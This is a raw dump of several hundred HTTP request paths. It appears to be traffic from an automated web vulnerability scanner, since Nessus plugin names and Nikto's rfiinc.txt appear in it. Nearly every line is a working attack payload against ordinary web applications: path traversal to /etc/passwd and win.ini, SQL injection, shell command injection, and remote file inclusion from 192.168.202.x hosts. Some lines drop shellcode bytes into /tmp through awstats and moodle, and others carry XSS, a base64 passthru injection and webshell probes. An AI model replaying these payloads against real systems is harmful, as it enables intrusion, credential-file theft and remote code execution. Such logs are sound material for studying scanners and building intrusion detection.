/cacti/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold /script/tick/test.php?path_to_code=http://192.168.202.118:8080/ghl9il? /passwdpk/ /um7xpn15.aspx? /en-us/account/rss.php?blogid=1&profile=../../config/config.properties.php\x00 /javascript/p2p.exe /help.php?q="ping,-w,11000,-n,1,1.2.3.4&rem, /o6ebbirj.jspa? /recordings/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login /tukodz3j.pl? /main.inc.php?pathtoscript=http://192.168.202.118:8080/tzhfyzkbomspvm? /mpcgi/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go /nyvbv05h.cfm? /5qnlm5z2.nsf? /scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1075239311,2,231042861,4,5,6,7,8,9,0,1,2,3 -- /cgi/a1stats/a1disp4.cgi?../../../../../../../etc/passwd /if69ddo1.idc? /gy23xnjq.exe? /h5i6crm3.cfm? /examples/jsp/checkbox/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\x00 /iajtej82.exe? /fc9t54l7.dll? /javascript/document.zip /javascript/codes.exe /7u1pb2xi.cfm? /examples/jsp/checkbox/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00 /forum1_professionnel.asp?n=1771&nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&page=1 /javascript/family.exe /main.php?stuff="|ping\x09-w\x097000\x09-n\x091\x091.2.3.4|rem\x09 /javascript/next.exe /awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/yzicxmyifv0;echo|awstats291064.txt /pxagj7n7.fts? /7o5qp766.cgi? /main.php?logout="&ping\x0c-w\x0c11000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /o35zot2r.cgi? /6n7aacgg.fts? /ddoworrl.mscgi? /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/iljyfcptvy0+>+/dev/null+&'); function v /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php&frm_user=&scr_height=&scr_width=q51964837 /b5xdqgz2.do? /main.php?logout="del\xa0q32937989&rem\xa0 /examples/jsp/colors/tinybrowser/upload.php?badfiles=1> /examples/jsp/jsp2/el/htmlscript?../../../../../../../../../etc/passwd /uvazfs7p.php3? /javascript/portals.exe /bzuf9ozq.idc? /examples/jsp/cal/cart32.exe /javascript/cfdocs.exe /6dlc2zm9.cfc? /x7pclv4s.jspa? /subscription_accounts/ /starnet/addons/slideshow_full.php?album_name='2073512306 /webscripter_professional/ /examples/jsp/checkbox/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&" /esmozg5d.nsf? /scripts/wa?debug-show-version /cgi.cgi/fileseek.cgi?foot=&head=;cat /etc/passwd| /a0imiuf1.do? /en-us/fo564rei.cfc? /ybz5rz7a.cfm? /xlj7h65o.htm? /ydexw8by.idc? /examples/jsp/cal/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc /hipkz026.jsp? /main.php?stuff="&ping;-w;8000;-n;1;1.2.3.4&rem; /scriptingnews2/ /gy23xnjq.asp? /en-us/33y9gcqq.php? /main.php?logout=";uname\x09>q86216423\x09# /javascript/rtf.exe /modules.php?op=modload&name=wiki&file=index&pagename= /javascript/hits.exe /javascript/packaged.exe /6wb70v0b.fts? /javascript/key.exe /manager/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd /eei78ore.nsf? /82q7ywa8.pl? /0z575z74.asp? /admin/news.admin.php?path_to_script=http://192.168.202.96:8080/llumt7msyau5y??&cmd=ls /scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331908740,1,705379658-- /javascript/downloader.exe /hrttz9fj.php? /cgi-home/fileseek2.cgi?foot=;cat /etc/passwd&head= /d5a5renl.exe? /examples/jsp/colors/backend/classes.php?include_path=../lib/jinzora.js\x00 /6n7aacgg.php? /javascript/callin.exe /examples/jsp/num/config.php?path[docroot]=/etc/passwd\x00 /scripts/lrn28issfuqi.pl /a0imiuf1.nsf? /help.php?q=uname\x09>q28292329\x09# /examples/jsp/num/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd /scripts/index.php?edit=nonexistant1039175028 /scripts/mail.php?id='/**/union/**/select/**/1,2,1332010406,4--&blog=1 /scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/tzhfyzkbomspvm? /h5sc3gxy.aspx? /examples/jsp/jsp2/el/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00 /examples/jsp/colors/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org /ovcgi/ovwebhelp.exe /se_tester'schoicelogo/ /de3v2dd9.nsf? /examples/jsp/sessions/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\x00 /examples/jsp/cal/save.php?file_save=/etc/passwd /javascript/webalizer.exe http://pjizgstmsezmytmzdudhgoanlryrqyevgutukoucyyhzubhijuwpcnmzcpqkvacnxssovdbegscoacprvpzshmnxaoc.com /wa.exe?debug-show-version /examples/jsp/num/activatemember?activatecode=&member="> /javascript/1999.exe /9ko6m4c8.htm? /en-us/s7qus4g3.php? /cacti/index.php?cat_select= /5o9zq43e.mscgi? /javascript/htpasswd.tmp /www/delivery/ac.php?bannerid=-1332010390+or+1=1+--+';passthru(base64_decode($_server[http_nessus_crnvjntc]));die;/* /en-us/n9xlumt5.mscgi? /o1zj4u9v.mscgi? /vmi8bb12.html? /xlj7h65o.idc? /examples/jsp/jsp2/jspx/include/theme.inc.php?fullpath=/etc/passwd\x00 /examples/jsp/jsp2/jspx/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd /cacti/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331905213,113095511 -- /javascript/file.exe /news.php?scriptpath=http://192.168.202.118:8080/zz5thkvtmlgl?? /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../vtigerservice.php\x00 /phpmyadmin/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print "content-type: text/plain\x0d\x0a\x0d\x0a";system(id)&action=logout /scripts/event_view.php?eid=34 union select 1183395596 /6wb70v0b.x? /protection.php?action=logout&siteurl=../../../../../../../../../../etc/passwd\x00 /en-us/w4996nr0.nsf? /main.php?logout=ping;-w;9000;-n;1;1.2.3.4|rem; /opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\x00 /en-us/account/index.php?cat=' /javascript/document.png /sdk/../../../../../../etc/vmware/hostd/vminventory.xml /index.php?categories=1&cat=xx' union/**/ select '1','412675581480','2','comments' /* /phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs"=sleep(4)=" /examples/jsp/checkbox/search/show.pl?url=file:/etc/passwd /recordings/index.php?id='union/**/select/**/0,0,1161314398,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /jw64yq8u.nsf? /examples/servlets/servlet/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/ /ygkjkngd.php3? /main.php?stuff=";uname\x09>q19299327\x09# /help.php?q=ver\xa0>q27113942&rem\xa0 /article.php?sid=\">document.cookie="testmybc=2088;" /cgi-bin/index.php?id=h6xj4vcok1' /1qwv2p5p.htm? /javascript/gateway.exe /inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/moclyxlwqyfjnp? /examples/jsp/jsp2/el/forum_2.php?msg=10&return= /nyvbv05h.aspx? /javascript/pop.exe /examples/jsp/sessions/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd /help.php?q='\x0asleep\x099\x09# /top.php?stuff="&ping -w 7000 -n 1 4.3.2.1&rem /a0imiuf1.cgi? /fnwhrxyd.x? /examples/jsp/jsp2/jspx/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\x00 /examples/jsp/cal/lang/lang.php?lang_path=/etc/passwd\x00 /javascript/events.exe /main.php?logout=rm;q78779487&rem; //

/rbec2ohx.fts? /examples/servlets/servlet/top.php?header=../../../../../../../../etc/passwd /main.php?logout="|ping,-w,11000,-n,1,1.2.3.4|rem, /nsn/..\util/md.bas /t3af3tdz.fts? /t3af3tdz.aspx? /en-us/odzk29aa.kspx? /cgi-exe/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go /en-us/jnv890lt.fts? /scripts/guestbook.php /advancedbashscriptingguide/ /examples/jsp/cal/js/scripts.php?load=/etc/passwd\x00 /main.php?stuff="|ping -w 11000 -n 1 1.2.3.4|rem /phpmyadmin/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl /en-us/esmozg5d.dll? /examples/jsp/checkbox/source?v=../../../../../../../../../../etc/passwd\x00 /scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null -- /nsn/..\util/dir.bas /templates/prescription/ /ht8pn8uq.x? /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008322&lang_crm=../../vtigerservice.php\x00 /javascript/crack.exe /cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1332010406,4--&blog=1 /don't panic/ /n9xlumt5.php3? /examples/jsp/colors/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\x00 /d7ktpmcq.html? /recordings/a1disp3.cgi?/../../../../../../etc/passwd /javascript/chris.exe /examples/jsp/sessions/texis.exe/?-dump /3m5knyc4.jspa? /tukodz3j.cgi? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+1a+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00++>>esbq /gepi/gestion/savebackup.php?filename=http://192.168.202.96:8080/txenjrxf3?&cmd=cat/etc/passwd /help.php?q=ver\x09>q23929766&rem\x09 /opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/whmch8ftkt7kv?\x00 /javascript/mailman.exe /phpmyadmin/search.cgi?..\..\..\..\..\..\winnt\win.ini /cgi-bin/fileseek2.cgi?head=&foot=;cat /etc/passwd /cgi-bin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /examples/jsp/sessions/store.cgi?startid=../../../../../../../../../etc/passwd\x00.html /a0imiuf1.pl? /if69ddo1.exe? /index.php?news7["functions"]=http://192.168.202.118:8080/ghl9il? /phpmyadmin/ion-p.exe?page=c:\\winnt\\win.ini /en-us/dda2qr7j.php? /manager/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00 /themes/simple/user_style.php?user_colors[bg_color]=" /destiny's-child/ /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=";echo ''; echo `id `;die();echo" /scripting_faq/ /606wkcop.do? /top.php?stuff="&del\x09q42671474&rem\x09 /viagra_prescription/ /examples/jsp/jsp2/el/cart32.exe /main.php?frm_daynight=q28628781&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php&frm_user=&scr_height=&scr_width= /javascript/contract.exe /main.php?stuff='\x0ddel\x09q12818567\x09# /main.php?stuff="&ver&rem\x0c /scripts/addentry.php /admin/index.php/"> /o1zj4u9v.kspx? /javascript/filelist.exe /admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/ipb5ri? /examples/jsp/jsp2/jspx/welcome.php?custom_welcome_page=/etc/passwd\x00 /examples/jsp/colors/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl /static//../../../../../../../../etc/passwd\x00 /valentine's day tips for single parents/ /guru - the street scriptures/ /examples/servlets/servlet/newsdesk.cgi?t=../../../../../../etc/passwd /? /examples/jsp/checkbox/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold /ashopcom-xss/ /help.php?q="&del,q45293431&rem, /examples/jsp/colors/login.php?user="> /en-us/n9xlumt5.cfc? /top.php?stuff="ping;-w;8000;-n;1;4.3.2.1&rem; /changesubscription/ /newsarchive.php?path_to_script=http://192.168.202.96:8080/4dckqcc0acprbz??&cmd=ls /examples/jsp/jsp2/el/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332009307','5'-- /wrt54scriptgenerator/ /cacti/save.php?file_save=/etc/passwd /awstats/awstats.pl?migrate=|echo;/bin/echo -en "h\0300\0250\0312fh\0002\0000\0247\0026\0211\0340j\0020pr" >> /tmp/gjvtlghpjb0;echo|awstats127569.txt /cgi-local/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go /cacti/al_initialize.php?alpath=/etc/passwd\x00 /cacti/pfdispaly?../../../../../../etc/passwd /main.php?stuff="ping\x09-w\x098000\x09-n\x091\x094.3.2.1&rem\x09 /recordings/a1stats/a1disp3.cgi?/../../../../../../etc/passwd //................etc/passwd /miz4r5hz.dll? /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3flogout%3d1&frm_user=&scr_height=q58671721&scr_width= /scripts/error.php?err=404 /scripts/ideabox/include.php?ideadir=http://xxxxxxxx /scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,2094158887,1430162522,1,1,1,1,1--&blogid=1 /scripts/auktion.cgi?menue=../../../../../../../../../etc/passwd /cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd\x00board=board_1 /t7tm4m0b.php3? /cacti/phptonuke.php?filnavn=/etc/passwd /33y9gcqq.cgi? / /de3v2dd9.asp? /scripts/r57.php /scripts/lce0cbkfb8xx.pl /0z575z74.jsp? /ows-bin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /javascript/custom-log.exe /examples/jsp/jsp2/el/admin/configset.php?settings_dir=/etc/passwd\x00 /cacti/main.php?g2_itemid=../../../../../license\x00 /s7qus4g3.x? /main.php?logout="&del q45435148 # /examples/jsp/error/demos/demo.browse.php?filename=/etc/passwd /javascript/ig.exe /javascript/ode.exe /rocco's initiations 9/ /javascript/dm-config.exe /examples/jsp/cal/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\x00 /j2kdmfw4.cgi? /i7prbs22.html? /h5i6crm3.exe? /_vti_bin/shtml.exe/_vti_rpc /phpmyadmin/index.cfm?fuseaction=category.display&category_id=' /cacti/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00 /main.php?stuff='uname # /apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00 /phpmyadmin/search.php?allwords=
&cid=0&title=1&desc=1 /mpcgi/ion-p.exe?page=c:\winnt\repair\sam /t3af3tdz.x? /help.php?q=;uname\x09>q16213317\x09# /javascript/owa.exe /javascript/browse.exe /main.php?stuff="ver\x09>q32749899&rem\x09 /javascript/obsoleted.exe /cacti/supporter/tupdate.php?groupid=change&sg=' /examples/jsp/colors/index.php?site=../../../../../../../../etc/passwd\x00 /en-us/account/dsweb/services/user-1"> /hipkz026.jspa? /vjbrrppi.aspx? /en-us/w4996nr0.aspx? /cgibin/ion-p?page=../../../../../etc/passwd /help.php?q="&ver\x09>q37118447&rem\x09 /jujgxwav.exe? /help.php?q="&uname\x09# /scripts/kfzqb5x87lvq.html /examples/jsp/checkbox/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00 /edzaia0i.jsp? /? /cgi-bin/pollit/poll_it_ssi_v2.0.cgi?data_dir=\etc\passwd\x00 /subscriptionpro/ /main.inc.php?pathtoscript=http://cirt.net/rfiinc.txt? /tukodz3j.do? /scriptpath/index.php?page=http://192.168.202.118:8080/2aibfaczmac8? /main.php?logout='sleep\x097\x09# /scripts/pnrwmkim.exe /top.php?stuff='uname\x09>q19246858\x09# /examples/jsp/cal/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl /manager/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl /javascript/webdata.exe /examples/jsp/sessions/file.php?path=/etc/passwd\x00 /p043snfr.pl? /fioricet-prescription/ /3hlysl2x.nsf? /en-us/fo564rei.php? /nmw0do67.cfm? /cgi-win/powerup/r.cgi?file=../../../../../../../../../../etc/passwd /x7pclv4s.php3? /examples/jsp/jsp2/el/index.php?site=../../../../../../../../etc/passwd\x00 /yef5f3d5.jsp? /javascript/pkgs.exe /top.php?stuff='&uname\x09>q46445966\x09# /top.php?stuff="rm\x0cq33687847&rem\x0c /eg2u8pbv.jsp? /cgi-home/powerup/r.cgi?file=../../../../../../../../../../etc/passwd /javascript/~dan.exe /cgi-bin/gbook/gbook.cgi?_mailto=xx;ls /yef5f3d5.x? /vbascripting/ /uc3w3bdi.jspa? /javascript/.passwd.tpl /en-us/account/ftp/ftp.pl?dir=../../../../../../etc /javascript/full.exe /phpmyadmin//../../../../../../../../etc/passwd\x00 /mpcgi/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /u8yiqilu.php3? /examples/jsp/checkbox/cgiip.exe/wservice=wsbroker1/webutil/ping.p /examples/jsp/num/ion-p.exe?page=../../../../../etc/passwd /examples/jsp/cal/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00 /h5sc3gxy.x? /scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/whmch8ftkt7kv? /examples/jsp/error/login.php?course="> /scripts/ui/login?user=nessus-1331904930 /scripts/powerup/r.cgi?file=../../../../../../../../../../etc/passwd /index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331908738','5'-- /m4kkjf8l.do? /cacti/awstatstotals.php?sort={${phpinfo()}}{${exit()}} /w4996nr0.php? /scripts/index.php?edit=nonexistant1922416618 /static//../../../../../../../../windows/win.ini /ht8pn8uq.cfm? /index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`; /examples/jsp/jsp2/jspx/zml.cgi?file=../../../../../../../../../../../../etc/passwd\x00 /user/remindpassword?return="><" /script/init/createallimagecache.php?path_to_code=http://192.168.202.96:8080/4dckqcc0acprbz? /netutils/findata.stm?host= /w4996nr0.pl? /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919142&lang_crm=../../../../../../../../../../../..//boot.ini\x00 /dataservice.asmx/authuser?username='nessus1331908868&password=nasl&needcompress=0 /vhzmaia2.cfm? /en-us/i686v90l.idc? /bad girls 'pardon me'/ /tukodz3j.jsp? /cgi-bin/texis.exe/junk /0z575z74.nsf? /edzaia0i.kspx? /scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1363072756-- /examples/jsp/sessions/includes/config.php?relative_script_path=http://xxxxxxx /ju0u7kfo.fts? /cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat /etc/passwd /t578vqea.asp? /jobdescriptionandsalary/ /term-readpasswd/ /ewc3rz1l.x? /javascript/backend.exe /admin/config.php?display=did&rnavsort=description&didfilter=directdid /examples/jsp/colors/popup.php?include_path=/etc/passwd\x00 /main.php?logout=';sleep 10 # /cacti/mail.php?id='/**/union/**/select/**/1,2,1331909423,4--&blog=1 /? /cacti/rss.php?blogid=1&profile=../../config/config.properties.php\x00 /javascript/notified.exe /examples/jsp/jsp2/el/phpnews/sendtofriend.php?mid='1' /en-us/account/index.php?search=&function=search /quagynka.mscgi? /phpwcms_template/inc_script/frontend_render/navigation/config_html_menu.php?html_menu_dirpath=http://192.168.202.118:8080/2aibfaczmac8? /examples/jsp/cal/faxsurvey?cat /etc/passwd /cgi-bin/pbcgi.cgi?name=joe\xcamel&email= /if69ddo1.aspx? /cgis/c32web.exe/changeadminpassword /javascript/thumbs.db.exe /examples/jsp/cal/forum_2.php?msg=10&return= /examples/jsp/cal/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\x00 /scgi-bin/sensepost.exe?/c+dir /cgi-914/gw5/gwweb.exe?htmlver=aaa&get-context /cgi-exe/powerup/r.cgi?file=../../../../../../../../../../etc/passwd //document.writeln(unescape("%3cscript src=%27http://www.example.com/test?rnd=q47944965%27><"+string.fromcharcode(0x2f)+"script>")) /javascript/.passwd.cgi /hjdzm96v.kspx? /scripts/quickstore.cgi?page=../../../../../../../../../../etc/passwd\x00html&cart_id= /7o5qp766.kspx? /en-us/33y9gcqq.do? /examples/jsp/numfaq.php?skin=../../admin/manager&tplpath=admin /recordings/webplus.exe?script=webplus_install_path.nasl /scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/no4ghqiguzhst? /hed_subscriptions/ /xsqln7eb.asp? /recordings/feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&debug=1 /yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\x00 /bl8sefdm.php3? /sawmillcl.exe?ho+{complete_version} /169okeyj.html? /examples/jsp/sessions/showproduct.php?product=1' /examples/jsp/sessions/quickstore.cgi?page=../../../../../../../../../../etc/passwd\x00html&cart_id= /? /jscript.php?my_ms[root]=http://192.168.202.118:8080/tzhfyzkbomspvm?? /examples/jsp/cal/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\x00 /examples/jsp/jsp2/el/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd /qczkquis.idc? /t578vqea.cfm? /cgi-perl/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe /demo/ms-pe02/catalog.php?cid=0&sid='"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.96:8080/4dckqcc0acprbz?& /help.php?q="\x0ddel\x09q99489698\x09# /javascript/www.exe /templates/tmpl_dfl/scripts/index.php?dir[inc]=@rfiurl /zuihld5m.asp? /apavxugx.cgi? /javascript/.htaccess/.htaccess.aspx-->">'>'" /scripts/www/delivery/ac.php?bannerid=-14+or+1=1 /gy23xnjq.cfm? /main.php?stuff='&del\x09q84519525\x09# /6wb70v0b.idc? /dslpwt15.html? /j4oqyvga.jsp? /javascript/apr.exe /x2gyorli.htm? /opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/txenjrxf3?\x00 /script_path/cms/classes/openengine/filepool.php?oe_classpath=http://cirt.net/rfiinc.txt?? /examples/jsp/jsp2/el/way-board/way-board.cgi?db=/etc/passwd\x00 /webplus.exe?script=webplus_install_path.nasl /miz4r5hz.do? /apavxugx.idc? /fnwhrxyd.mscgi? /en-us/account/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@ /top.php?stuff=';sleep\x098\x09# /cgi.cgi/fileseek2.cgi?foot=&head=;cat /etc/passwd| /um7xpn15.dll? /main.php?stuff="rm\x09q32749899&rem\x09 /top.php?stuff=ver\xa0>q79682776&rem\xa0 /main.php?stuff=';uname\x09>q26313493\x09# /top.php?stuff='\x0asleep\x0911\x09# /examples/jsp/colors/viewcvs.cgi/?cvsroot= /helpnoscript_cds2/ /examples/jsp/checkbox/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00 /examples/servlets/servlet/admin.php?style=../../../../../../../../../../../../etc/passwd\x00 /examples/jsp/error/install.php?newlang=../../cpg_error.log\x00 /kcsubscription/ /evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919216,539900350 -- /"jason scott" podcasts/ /administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://cirt.net/rfiinc.txt? /byrg33fw.x? /en-us/oie504mr.x? /audio_transcripts/ /o1zj4u9v.dll? /h21y8w52.pl? /ghswfouu.jsp? / /examples/jsp/sessions/sgdynamo.exe?htname= /main.php?logout="&ping\x0b-w\x0b11000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b /examples/jsp/sessions/index.php?op=default&date=200607' union select 1,1927066382,1,1,1,1,1,1,1,1--&blogid=1 /jujgxwav.exe? /b4vng02k.fts? /main.php?logout=1' and 1=1 and ''<>'tvd59u9i /606wkcop.jsp? /d765w06j.cgi? /nuh3zirz.aspx? /help.php?q="&del\x0bq12933545&rem\x0b /cgi-bin/base_local_rules.php?dir= /scripts/browsedisk.asp /a0imiuf1.php3? /cacti?username=" ftp://192.168.25.203/* /javascript/crypto.exe /phpmyadmin/simple/view_page?mv_arg=|cat /etc/passwd| /scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1928587300-- /cgi-home/gwweb.exe?help=bad-request /script/index.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm? /scripts/kfzqb5x87lvq.php /javascript/tb.exe /7dbjwpw6.kspx? /quagynka.html? /index.php?name=your account&profile=anyone"> /examples/jsp/checkbox/kernel/loadkernel.php?installpath=/etc/passwd\x00 /main.php?stuff="\x0auname >q16731133 # /cgi-bin/?mod=read&id=../../../../../../../../../../../../../etc/passwd\x00 /scripts/shoutbox.php?conf=../ /macroscript webrecorder_information/ /phpmyadmin/cgiip.exe/wservice=wsbroker1/webutil/ping.p /handyman's handbook/ /ewc3rz1l.nsf? /sysuser/docmgr/rename.stm?path= /hjdzm96v.html? /scripts/newsdata/data/user.idx /main.php?logout=&ping;-w;11000;-n;1;1.2.3.4&rem; /jnv890lt.fts? /en-us/n9xlumt5.cfm? /en-us/esmozg5d.php3? /scripts/modules/projects/sql/install-0.9.7.php?p=2 /help.php?q="&del;q11575615&rem; /scripts/weigh_keywords.php?etcdir=http://192.168.202.118:8080/zz5thkvtmlgl? /report.php?scriptpath=http://192.168.202.96:8080/4dckqcc0acprbz?? /vmi8bb12.aspx? /examples/jsp/jsp2/jspx/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00 /main.php?logout="del\x09q74671245\x09# /eel's cptech site/ /axufhcur.exe/ /examples/jsp/jsp2/jspx/mmstdod.cgi?alternate_templates=| echo "content-type: text/html";echo "" ; id\x00 /webtools/bonsai/cvslog.cgi?file= /fpnpp5zg.jsp? /javascript/consumer.exe /scripts/bveygnpo6hkw.cgi /index.php?p='nessus /judy's_book/ /scripts/u7m5ok8eqpfy.sh /en-us/oie504mr.idc? /tuwjta1w.jsp? /o6ebbirj.php3? /?user=jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--&file=index&pass= /javascript/~apache.exe /examples/jsp/sessions/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl /javascript/exchange.exe /top.php?stuff=&ver >q94375741&rem /0u75ldxq.exe? /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../vtigerservice.php\x00 /scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 2125564349-- /examples/jsp/num/forum_2.php?msg=10&return= /awstats/awstats.pl?migrate=|echo;/bin/echo -en "zj\0003x\0315\0200xp1\0322\0262\0377\0266\0377\0001\0320" >> /tmp/urcppbumwm0;echo|awstats535559.txt /scripts/wx4z4gedhl0l.cgi /examples/jsp/colors/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; /servlet/org.apache.catalina.containerservlet/ /examples/jsp/cal/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /jackrabbit/search.jsp?q=%" /javascript/resources.exe /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+64+6c+6c+20+47+65+74+50+72+6f+63+41+64+64+72+65+73+73+4c+6f+61+64+4c+69+62++>>ctdn /xlj7h65o.jspa? /examples/jsp/jsp2/jspx/search.php?allwords=
&cid=0&title=1&desc=1 /javascript/automatic.exe /content/base/build/explorer/none.php?/etc/passwd /search.jsp?q=%" /vhzmaia2.fts? /scripts/sssdpups.exe /javascript/john.exe /scripts/bb-hist.sh?histfile=../../../../../etc/passwd / /examples/jsp/error/a1stats/a1disp3.cgi?/../../../../../../etc/passwd /macosxsshhelper/ /subscriptions.trace /scripts/admin.php?style=../../../../../../../../../../../../etc/passwd\x00 /jnt3f86c.php3? /cacti/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd /en-us/hipkz026.dll? /top.php?stuff=';uname\x09>q65186773\x09# /main.php?stuff='uname >q95495989 # /if69ddo1.php? /dslpwt15.cfm? /manager/mlog.html?screen=/etc/passwd /vwmg565s.php? /path/nw/article.php?id=' /antiboard.php?thread_id=' /examples/jsp/error/admin/admin.php?sid=' /cgi-bin/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\ /flower travellin' band/ /examples/jsp/cal/bandwidth/index.cgi?action=showmonth&year=&month= /help.php?q=&del;q65325882&rem; /n1afe1y6.idc? /wdb-description/ /index.php?src=1&_common=1&time=1331919221&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /main.php?stuff="ping\x0c-w\x0c8000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /scripts/empower?db=whateverwhatever /jw64yq8u.pl? /examples/jsp/jsp2/jspx/simple/view_page?mv_arg=|cat /etc/passwd| / /javascript/sale.exe /vac1l5vm.jspa? /scripts/sendform.cgi /? /main.php?stuff="del\x0cq45919726&rem\x0c /javascript/replicate.exe /ovcgi/main/snmp.exe /main.php?stuff="&rm\x09q89486418&rem\x09 /en-us/jnv890lt.cfm? /scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 -- /top.php?stuff="&del q95298396 # /vhzmaia2.jspa? /lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl /logo_description/ /j2kdmfw4.html? /library/ajax/prescription_drugname_lookup.php /help.php?q="&del,q46141422&rem, /cgi-bin/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl /medicaltranscriptionjobopening/ /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /0u75ldxq.asp? /scgi-bin/testcgi.exe 